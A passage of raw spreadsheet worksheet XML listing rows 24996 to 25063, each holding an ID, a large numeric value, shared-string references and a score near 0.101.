      <c r="E24996" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24996" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="24997" ht="15.75" customHeight="1">
      <c r="A24997" s="1">
        <v>25436.0</v>
      </c>
      <c r="B24997" s="2">
        <v>1.3867575E7</v>
      </c>
      <c r="C24997" s="2" t="s">
        <v>15038</v>
      </c>
      <c r="D24997" s="2">
        <v>1.0</v>
      </c>
      <c r="E24997" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24997" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="24998" ht="15.75" customHeight="1">
      <c r="A24998" s="1">
        <v>29407.0</v>
      </c>
      <c r="B24998" s="2">
        <v>3.2035317E7</v>
      </c>
      <c r="C24998" s="2" t="s">
        <v>24054</v>
      </c>
      <c r="D24998" s="2">
        <v>1.0</v>
      </c>
      <c r="E24998" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24998" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="24999" ht="15.75" customHeight="1">
      <c r="A24999" s="1">
        <v>30203.0</v>
      </c>
      <c r="B24999" s="2">
        <v>3.7304006E7</v>
      </c>
      <c r="C24999" s="2" t="s">
        <v>24055</v>
      </c>
      <c r="D24999" s="2">
        <v>1.0</v>
      </c>
      <c r="E24999" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24999" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="25000" ht="15.75" customHeight="1">
      <c r="A25000" s="1">
        <v>12346.0</v>
      </c>
      <c r="B25000" s="2">
        <v>2.863041E7</v>
      </c>
      <c r="C25000" s="2" t="s">
        <v>24056</v>
      </c>
      <c r="D25000" s="2">
        <v>1.0</v>
      </c>
      <c r="E25000" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25000" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="25001" ht="15.75" customHeight="1">
      <c r="A25001" s="1">
        <v>23479.0</v>
      </c>
      <c r="B25001" s="2">
        <v>5.7292628E7</v>
      </c>
      <c r="C25001" s="2" t="s">
        <v>24057</v>
      </c>
      <c r="D25001" s="2">
        <v>1.0</v>
      </c>
      <c r="E25001" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25001" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="25002" ht="15.75" customHeight="1">
      <c r="A25002" s="1">
        <v>27285.0</v>
      </c>
      <c r="B25002" s="2">
        <v>2.1239261E7</v>
      </c>
      <c r="C25002" s="2" t="s">
        <v>23797</v>
      </c>
      <c r="D25002" s="2">
        <v>1.0</v>
      </c>
      <c r="E25002" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25002" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="25003" ht="15.75" customHeight="1">
      <c r="A25003" s="1">
        <v>7229.0</v>
      </c>
      <c r="B25003" s="2">
        <v>5.0662934E7</v>
      </c>
      <c r="C25003" s="5" t="s">
        <v>24058</v>
      </c>
      <c r="D25003" s="2">
        <v>1.0</v>
      </c>
      <c r="E25003" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25003" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="25004" ht="15.75" customHeight="1">
      <c r="A25004" s="1">
        <v>27028.0</v>
      </c>
      <c r="B25004" s="2">
        <v>2.0041654E7</v>
      </c>
      <c r="C25004" s="2" t="s">
        <v>24059</v>
      </c>
      <c r="D25004" s="2">
        <v>1.0</v>
      </c>
      <c r="E25004" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25004" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="25005" ht="15.75" customHeight="1">
      <c r="A25005" s="1">
        <v>167.0</v>
      </c>
      <c r="B25005" s="2">
        <v>1.3780365E7</v>
      </c>
      <c r="C25005" s="2" t="s">
        <v>24060</v>
      </c>
      <c r="D25005" s="2">
        <v>1.0</v>
      </c>
      <c r="E25005" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25005" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25006" ht="15.75" customHeight="1">
      <c r="A25006" s="1">
        <v>179.0</v>
      </c>
      <c r="B25006" s="2">
        <v>1.4136218E7</v>
      </c>
      <c r="C25006" s="2" t="s">
        <v>24061</v>
      </c>
      <c r="D25006" s="2">
        <v>1.0</v>
      </c>
      <c r="E25006" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25006" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25007" ht="15.75" customHeight="1">
      <c r="A25007" s="1">
        <v>284.0</v>
      </c>
      <c r="B25007" s="2">
        <v>1.5399954E7</v>
      </c>
      <c r="C25007" s="2" t="s">
        <v>24062</v>
      </c>
      <c r="D25007" s="2">
        <v>1.0</v>
      </c>
      <c r="E25007" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25007" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25008" ht="15.75" customHeight="1">
      <c r="A25008" s="1">
        <v>427.0</v>
      </c>
      <c r="B25008" s="2">
        <v>1.6948708E7</v>
      </c>
      <c r="C25008" s="2" t="s">
        <v>24063</v>
      </c>
      <c r="D25008" s="2">
        <v>1.0</v>
      </c>
      <c r="E25008" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25008" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25009" ht="15.75" customHeight="1">
      <c r="A25009" s="1">
        <v>947.0</v>
      </c>
      <c r="B25009" s="2">
        <v>2.2571379E7</v>
      </c>
      <c r="C25009" s="2" t="s">
        <v>24064</v>
      </c>
      <c r="D25009" s="2">
        <v>1.0</v>
      </c>
      <c r="E25009" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25009" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25010" ht="15.75" customHeight="1">
      <c r="A25010" s="1">
        <v>1072.0</v>
      </c>
      <c r="B25010" s="2">
        <v>2.357146E7</v>
      </c>
      <c r="C25010" s="2" t="s">
        <v>24065</v>
      </c>
      <c r="D25010" s="2">
        <v>1.0</v>
      </c>
      <c r="E25010" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25010" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25011" ht="15.75" customHeight="1">
      <c r="A25011" s="1">
        <v>1232.0</v>
      </c>
      <c r="B25011" s="2">
        <v>2.5028465E7</v>
      </c>
      <c r="C25011" s="2" t="s">
        <v>24066</v>
      </c>
      <c r="D25011" s="2">
        <v>1.0</v>
      </c>
      <c r="E25011" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25011" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25012" ht="15.75" customHeight="1">
      <c r="A25012" s="1">
        <v>1394.0</v>
      </c>
      <c r="B25012" s="2">
        <v>2.6270381E7</v>
      </c>
      <c r="C25012" s="2" t="s">
        <v>24067</v>
      </c>
      <c r="D25012" s="2">
        <v>1.0</v>
      </c>
      <c r="E25012" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25012" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25013" ht="15.75" customHeight="1">
      <c r="A25013" s="1">
        <v>1898.0</v>
      </c>
      <c r="B25013" s="2">
        <v>2.9877118E7</v>
      </c>
      <c r="C25013" s="2" t="s">
        <v>24068</v>
      </c>
      <c r="D25013" s="2">
        <v>1.0</v>
      </c>
      <c r="E25013" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25013" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25014" ht="15.75" customHeight="1">
      <c r="A25014" s="1">
        <v>2676.0</v>
      </c>
      <c r="B25014" s="2">
        <v>3.4794828E7</v>
      </c>
      <c r="C25014" s="2" t="s">
        <v>24069</v>
      </c>
      <c r="D25014" s="2">
        <v>1.0</v>
      </c>
      <c r="E25014" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25014" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25015" ht="15.75" customHeight="1">
      <c r="A25015" s="1">
        <v>3359.0</v>
      </c>
      <c r="B25015" s="2">
        <v>3784384.0</v>
      </c>
      <c r="C25015" s="2" t="s">
        <v>24070</v>
      </c>
      <c r="D25015" s="2">
        <v>1.0</v>
      </c>
      <c r="E25015" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25015" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25016" ht="15.75" customHeight="1">
      <c r="A25016" s="1">
        <v>3840.0</v>
      </c>
      <c r="B25016" s="2">
        <v>4.020627E7</v>
      </c>
      <c r="C25016" s="2" t="s">
        <v>24071</v>
      </c>
      <c r="D25016" s="2">
        <v>1.0</v>
      </c>
      <c r="E25016" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25016" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25017" ht="15.75" customHeight="1">
      <c r="A25017" s="1">
        <v>3904.0</v>
      </c>
      <c r="B25017" s="2">
        <v>4.0481692E7</v>
      </c>
      <c r="C25017" s="2" t="s">
        <v>24072</v>
      </c>
      <c r="D25017" s="2">
        <v>1.0</v>
      </c>
      <c r="E25017" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25017" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25018" ht="15.75" customHeight="1">
      <c r="A25018" s="1">
        <v>3986.0</v>
      </c>
      <c r="B25018" s="2">
        <v>4.0845799E7</v>
      </c>
      <c r="C25018" s="2" t="s">
        <v>24073</v>
      </c>
      <c r="D25018" s="2">
        <v>1.0</v>
      </c>
      <c r="E25018" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25018" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25019" ht="15.75" customHeight="1">
      <c r="A25019" s="1">
        <v>4530.0</v>
      </c>
      <c r="B25019" s="2">
        <v>4.2622715E7</v>
      </c>
      <c r="C25019" s="2" t="s">
        <v>24074</v>
      </c>
      <c r="D25019" s="2">
        <v>1.0</v>
      </c>
      <c r="E25019" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25019" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25020" ht="15.75" customHeight="1">
      <c r="A25020" s="1">
        <v>4547.0</v>
      </c>
      <c r="B25020" s="2">
        <v>4.2683581E7</v>
      </c>
      <c r="C25020" s="2" t="s">
        <v>24075</v>
      </c>
      <c r="D25020" s="2">
        <v>1.0</v>
      </c>
      <c r="E25020" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25020" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25021" ht="15.75" customHeight="1">
      <c r="A25021" s="1">
        <v>5246.0</v>
      </c>
      <c r="B25021" s="2">
        <v>4.5067059E7</v>
      </c>
      <c r="C25021" s="2" t="s">
        <v>24076</v>
      </c>
      <c r="D25021" s="2">
        <v>1.0</v>
      </c>
      <c r="E25021" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25021" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25022" ht="15.75" customHeight="1">
      <c r="A25022" s="1">
        <v>5442.0</v>
      </c>
      <c r="B25022" s="2">
        <v>4.5608696E7</v>
      </c>
      <c r="C25022" s="2" t="s">
        <v>24077</v>
      </c>
      <c r="D25022" s="2">
        <v>1.0</v>
      </c>
      <c r="E25022" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25022" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25023" ht="15.75" customHeight="1">
      <c r="A25023" s="1">
        <v>5542.0</v>
      </c>
      <c r="B25023" s="2">
        <v>4.59248E7</v>
      </c>
      <c r="C25023" s="2" t="s">
        <v>24078</v>
      </c>
      <c r="D25023" s="2">
        <v>1.0</v>
      </c>
      <c r="E25023" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25023" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25024" ht="15.75" customHeight="1">
      <c r="A25024" s="1">
        <v>5579.0</v>
      </c>
      <c r="B25024" s="2">
        <v>4.6045751E7</v>
      </c>
      <c r="C25024" s="2" t="s">
        <v>24079</v>
      </c>
      <c r="D25024" s="2">
        <v>1.0</v>
      </c>
      <c r="E25024" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25024" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25025" ht="15.75" customHeight="1">
      <c r="A25025" s="1">
        <v>6020.0</v>
      </c>
      <c r="B25025" s="2">
        <v>4.7504462E7</v>
      </c>
      <c r="C25025" s="2" t="s">
        <v>24080</v>
      </c>
      <c r="D25025" s="2">
        <v>1.0</v>
      </c>
      <c r="E25025" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25025" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25026" ht="15.75" customHeight="1">
      <c r="A25026" s="1">
        <v>6588.0</v>
      </c>
      <c r="B25026" s="2">
        <v>4.897749E7</v>
      </c>
      <c r="C25026" s="2" t="s">
        <v>24081</v>
      </c>
      <c r="D25026" s="2">
        <v>1.0</v>
      </c>
      <c r="E25026" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25026" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25027" ht="15.75" customHeight="1">
      <c r="A25027" s="1">
        <v>6905.0</v>
      </c>
      <c r="B25027" s="2">
        <v>4.9814134E7</v>
      </c>
      <c r="C25027" s="2" t="s">
        <v>24082</v>
      </c>
      <c r="D25027" s="2">
        <v>1.0</v>
      </c>
      <c r="E25027" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25027" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25028" ht="15.75" customHeight="1">
      <c r="A25028" s="1">
        <v>6913.0</v>
      </c>
      <c r="B25028" s="2">
        <v>4.98464E7</v>
      </c>
      <c r="C25028" s="2" t="s">
        <v>24083</v>
      </c>
      <c r="D25028" s="2">
        <v>1.0</v>
      </c>
      <c r="E25028" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25028" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25029" ht="15.75" customHeight="1">
      <c r="A25029" s="1">
        <v>7920.0</v>
      </c>
      <c r="B25029" s="2">
        <v>5.2538518E7</v>
      </c>
      <c r="C25029" s="2" t="s">
        <v>24084</v>
      </c>
      <c r="D25029" s="2">
        <v>1.0</v>
      </c>
      <c r="E25029" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25029" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25030" ht="15.75" customHeight="1">
      <c r="A25030" s="1">
        <v>8481.0</v>
      </c>
      <c r="B25030" s="2">
        <v>5.4026798E7</v>
      </c>
      <c r="C25030" s="2" t="s">
        <v>24085</v>
      </c>
      <c r="D25030" s="2">
        <v>1.0</v>
      </c>
      <c r="E25030" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25030" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25031" ht="15.75" customHeight="1">
      <c r="A25031" s="1">
        <v>9091.0</v>
      </c>
      <c r="B25031" s="2">
        <v>5.5144452E7</v>
      </c>
      <c r="C25031" s="2" t="s">
        <v>24086</v>
      </c>
      <c r="D25031" s="2">
        <v>1.0</v>
      </c>
      <c r="E25031" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25031" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25032" ht="15.75" customHeight="1">
      <c r="A25032" s="1">
        <v>9908.0</v>
      </c>
      <c r="B25032" s="2">
        <v>5.678411E7</v>
      </c>
      <c r="C25032" s="2" t="s">
        <v>24087</v>
      </c>
      <c r="D25032" s="2">
        <v>1.0</v>
      </c>
      <c r="E25032" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25032" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25033" ht="15.75" customHeight="1">
      <c r="A25033" s="1">
        <v>9972.0</v>
      </c>
      <c r="B25033" s="2">
        <v>5.6942487E7</v>
      </c>
      <c r="C25033" s="2" t="s">
        <v>24088</v>
      </c>
      <c r="D25033" s="2">
        <v>1.0</v>
      </c>
      <c r="E25033" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25033" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25034" ht="15.75" customHeight="1">
      <c r="A25034" s="1">
        <v>10538.0</v>
      </c>
      <c r="B25034" s="2">
        <v>1240906.0</v>
      </c>
      <c r="C25034" s="2" t="s">
        <v>24089</v>
      </c>
      <c r="D25034" s="2">
        <v>1.0</v>
      </c>
      <c r="E25034" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25034" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25035" ht="15.75" customHeight="1">
      <c r="A25035" s="1">
        <v>10990.0</v>
      </c>
      <c r="B25035" s="2">
        <v>1.7421296E7</v>
      </c>
      <c r="C25035" s="2" t="s">
        <v>24090</v>
      </c>
      <c r="D25035" s="2">
        <v>1.0</v>
      </c>
      <c r="E25035" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25035" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25036" ht="15.75" customHeight="1">
      <c r="A25036" s="1">
        <v>11427.0</v>
      </c>
      <c r="B25036" s="2">
        <v>2.1739149E7</v>
      </c>
      <c r="C25036" s="2" t="s">
        <v>24091</v>
      </c>
      <c r="D25036" s="2">
        <v>1.0</v>
      </c>
      <c r="E25036" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25036" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25037" ht="15.75" customHeight="1">
      <c r="A25037" s="1">
        <v>11486.0</v>
      </c>
      <c r="B25037" s="2">
        <v>2.2030222E7</v>
      </c>
      <c r="C25037" s="2" t="s">
        <v>24092</v>
      </c>
      <c r="D25037" s="2">
        <v>1.0</v>
      </c>
      <c r="E25037" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25037" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25038" ht="15.75" customHeight="1">
      <c r="A25038" s="1">
        <v>11942.0</v>
      </c>
      <c r="B25038" s="2">
        <v>2.5541274E7</v>
      </c>
      <c r="C25038" s="2" t="s">
        <v>24093</v>
      </c>
      <c r="D25038" s="2">
        <v>1.0</v>
      </c>
      <c r="E25038" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25038" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25039" ht="15.75" customHeight="1">
      <c r="A25039" s="1">
        <v>13692.0</v>
      </c>
      <c r="B25039" s="2">
        <v>3.6111178E7</v>
      </c>
      <c r="C25039" s="2" t="s">
        <v>24094</v>
      </c>
      <c r="D25039" s="2">
        <v>1.0</v>
      </c>
      <c r="E25039" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25039" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25040" ht="15.75" customHeight="1">
      <c r="A25040" s="1">
        <v>13736.0</v>
      </c>
      <c r="B25040" s="2">
        <v>3.6428651E7</v>
      </c>
      <c r="C25040" s="2" t="s">
        <v>24095</v>
      </c>
      <c r="D25040" s="2">
        <v>1.0</v>
      </c>
      <c r="E25040" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25040" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25041" ht="15.75" customHeight="1">
      <c r="A25041" s="1">
        <v>13794.0</v>
      </c>
      <c r="B25041" s="2">
        <v>3.659163E7</v>
      </c>
      <c r="C25041" s="2" t="s">
        <v>24096</v>
      </c>
      <c r="D25041" s="2">
        <v>1.0</v>
      </c>
      <c r="E25041" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25041" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25042" ht="15.75" customHeight="1">
      <c r="A25042" s="1">
        <v>14005.0</v>
      </c>
      <c r="B25042" s="2">
        <v>3.738699E7</v>
      </c>
      <c r="C25042" s="2" t="s">
        <v>24097</v>
      </c>
      <c r="D25042" s="2">
        <v>1.0</v>
      </c>
      <c r="E25042" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25042" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25043" ht="15.75" customHeight="1">
      <c r="A25043" s="1">
        <v>14089.0</v>
      </c>
      <c r="B25043" s="2">
        <v>3.7718093E7</v>
      </c>
      <c r="C25043" s="5" t="s">
        <v>24098</v>
      </c>
      <c r="D25043" s="2">
        <v>1.0</v>
      </c>
      <c r="E25043" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25043" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25044" ht="15.75" customHeight="1">
      <c r="A25044" s="1">
        <v>15105.0</v>
      </c>
      <c r="B25044" s="2">
        <v>4.183156E7</v>
      </c>
      <c r="C25044" s="2" t="s">
        <v>24099</v>
      </c>
      <c r="D25044" s="2">
        <v>1.0</v>
      </c>
      <c r="E25044" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25044" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25045" ht="15.75" customHeight="1">
      <c r="A25045" s="1">
        <v>15173.0</v>
      </c>
      <c r="B25045" s="2">
        <v>4.2010786E7</v>
      </c>
      <c r="C25045" s="2" t="s">
        <v>24100</v>
      </c>
      <c r="D25045" s="2">
        <v>1.0</v>
      </c>
      <c r="E25045" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25045" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25046" ht="15.75" customHeight="1">
      <c r="A25046" s="1">
        <v>15339.0</v>
      </c>
      <c r="B25046" s="2">
        <v>4.2602917E7</v>
      </c>
      <c r="C25046" s="2" t="s">
        <v>24101</v>
      </c>
      <c r="D25046" s="2">
        <v>1.0</v>
      </c>
      <c r="E25046" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25046" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25047" ht="15.75" customHeight="1">
      <c r="A25047" s="1">
        <v>15683.0</v>
      </c>
      <c r="B25047" s="2">
        <v>4.3849718E7</v>
      </c>
      <c r="C25047" s="2" t="s">
        <v>24102</v>
      </c>
      <c r="D25047" s="2">
        <v>1.0</v>
      </c>
      <c r="E25047" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25047" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25048" ht="15.75" customHeight="1">
      <c r="A25048" s="1">
        <v>16030.0</v>
      </c>
      <c r="B25048" s="2">
        <v>4.5103925E7</v>
      </c>
      <c r="C25048" s="2" t="s">
        <v>24103</v>
      </c>
      <c r="D25048" s="2">
        <v>1.0</v>
      </c>
      <c r="E25048" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25048" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25049" ht="15.75" customHeight="1">
      <c r="A25049" s="1">
        <v>16229.0</v>
      </c>
      <c r="B25049" s="2">
        <v>4.572979E7</v>
      </c>
      <c r="C25049" s="2" t="s">
        <v>24104</v>
      </c>
      <c r="D25049" s="2">
        <v>1.0</v>
      </c>
      <c r="E25049" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25049" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25050" ht="15.75" customHeight="1">
      <c r="A25050" s="1">
        <v>16468.0</v>
      </c>
      <c r="B25050" s="2">
        <v>4.6498564E7</v>
      </c>
      <c r="C25050" s="2" t="s">
        <v>24105</v>
      </c>
      <c r="D25050" s="2">
        <v>1.0</v>
      </c>
      <c r="E25050" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25050" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25051" ht="15.75" customHeight="1">
      <c r="A25051" s="1">
        <v>16505.0</v>
      </c>
      <c r="B25051" s="2">
        <v>4.6606089E7</v>
      </c>
      <c r="C25051" s="2" t="s">
        <v>24106</v>
      </c>
      <c r="D25051" s="2">
        <v>1.0</v>
      </c>
      <c r="E25051" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25051" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25052" ht="15.75" customHeight="1">
      <c r="A25052" s="1">
        <v>16837.0</v>
      </c>
      <c r="B25052" s="2">
        <v>4.7898289E7</v>
      </c>
      <c r="C25052" s="2" t="s">
        <v>24107</v>
      </c>
      <c r="D25052" s="2">
        <v>1.0</v>
      </c>
      <c r="E25052" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25052" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25053" ht="15.75" customHeight="1">
      <c r="A25053" s="1">
        <v>17190.0</v>
      </c>
      <c r="B25053" s="2">
        <v>4.8920138E7</v>
      </c>
      <c r="C25053" s="2" t="s">
        <v>24108</v>
      </c>
      <c r="D25053" s="2">
        <v>1.0</v>
      </c>
      <c r="E25053" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25053" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25054" ht="15.75" customHeight="1">
      <c r="A25054" s="1">
        <v>17460.0</v>
      </c>
      <c r="B25054" s="2">
        <v>4.9846401E7</v>
      </c>
      <c r="C25054" s="2" t="s">
        <v>24109</v>
      </c>
      <c r="D25054" s="2">
        <v>1.0</v>
      </c>
      <c r="E25054" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25054" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25055" ht="15.75" customHeight="1">
      <c r="A25055" s="1">
        <v>18888.0</v>
      </c>
      <c r="B25055" s="2">
        <v>5.4119375E7</v>
      </c>
      <c r="C25055" s="2" t="s">
        <v>24110</v>
      </c>
      <c r="D25055" s="2">
        <v>1.0</v>
      </c>
      <c r="E25055" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25055" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25056" ht="15.75" customHeight="1">
      <c r="A25056" s="1">
        <v>19122.0</v>
      </c>
      <c r="B25056" s="2">
        <v>5.4757932E7</v>
      </c>
      <c r="C25056" s="2" t="s">
        <v>24111</v>
      </c>
      <c r="D25056" s="2">
        <v>1.0</v>
      </c>
      <c r="E25056" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25056" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25057" ht="15.75" customHeight="1">
      <c r="A25057" s="1">
        <v>19229.0</v>
      </c>
      <c r="B25057" s="2">
        <v>5.5059538E7</v>
      </c>
      <c r="C25057" s="2" t="s">
        <v>24112</v>
      </c>
      <c r="D25057" s="2">
        <v>1.0</v>
      </c>
      <c r="E25057" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25057" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25058" ht="15.75" customHeight="1">
      <c r="A25058" s="1">
        <v>19369.0</v>
      </c>
      <c r="B25058" s="2">
        <v>5.5470859E7</v>
      </c>
      <c r="C25058" s="2" t="s">
        <v>24113</v>
      </c>
      <c r="D25058" s="2">
        <v>1.0</v>
      </c>
      <c r="E25058" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25058" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25059" ht="15.75" customHeight="1">
      <c r="A25059" s="1">
        <v>20017.0</v>
      </c>
      <c r="B25059" s="2">
        <v>5931447.0</v>
      </c>
      <c r="C25059" s="2" t="s">
        <v>24114</v>
      </c>
      <c r="D25059" s="2">
        <v>1.0</v>
      </c>
      <c r="E25059" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25059" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25060" ht="15.75" customHeight="1">
      <c r="A25060" s="1">
        <v>20123.0</v>
      </c>
      <c r="B25060" s="2">
        <v>6109800.0</v>
      </c>
      <c r="C25060" s="2" t="s">
        <v>24115</v>
      </c>
      <c r="D25060" s="2">
        <v>1.0</v>
      </c>
      <c r="E25060" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25060" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25061" ht="15.75" customHeight="1">
      <c r="A25061" s="1">
        <v>20139.0</v>
      </c>
      <c r="B25061" s="2">
        <v>1.0147121E7</v>
      </c>
      <c r="C25061" s="2" t="s">
        <v>24116</v>
      </c>
      <c r="D25061" s="2">
        <v>1.0</v>
      </c>
      <c r="E25061" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25061" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25062" ht="15.75" customHeight="1">
      <c r="A25062" s="1">
        <v>20218.0</v>
      </c>
      <c r="B25062" s="2">
        <v>1.0740252E7</v>
      </c>
      <c r="C25062" s="2" t="s">
        <v>24117</v>
      </c>
      <c r="D25062" s="2">
        <v>1.0</v>
      </c>
      <c r="E25062" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25062" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="25063" ht="15.75" customHeight="1">
      <c r="A25063" s="1">
        <v>20350.0</v>
      </c>
      <c r="B25063" s="2">
        <v>1.1650424E7</v>
      </c>
      <c r="C25063" s="2" t="s">
        <v>24118</v>
      </c>
      <c r="D25063" s="2">
        <v>1.0</v>
      </c>
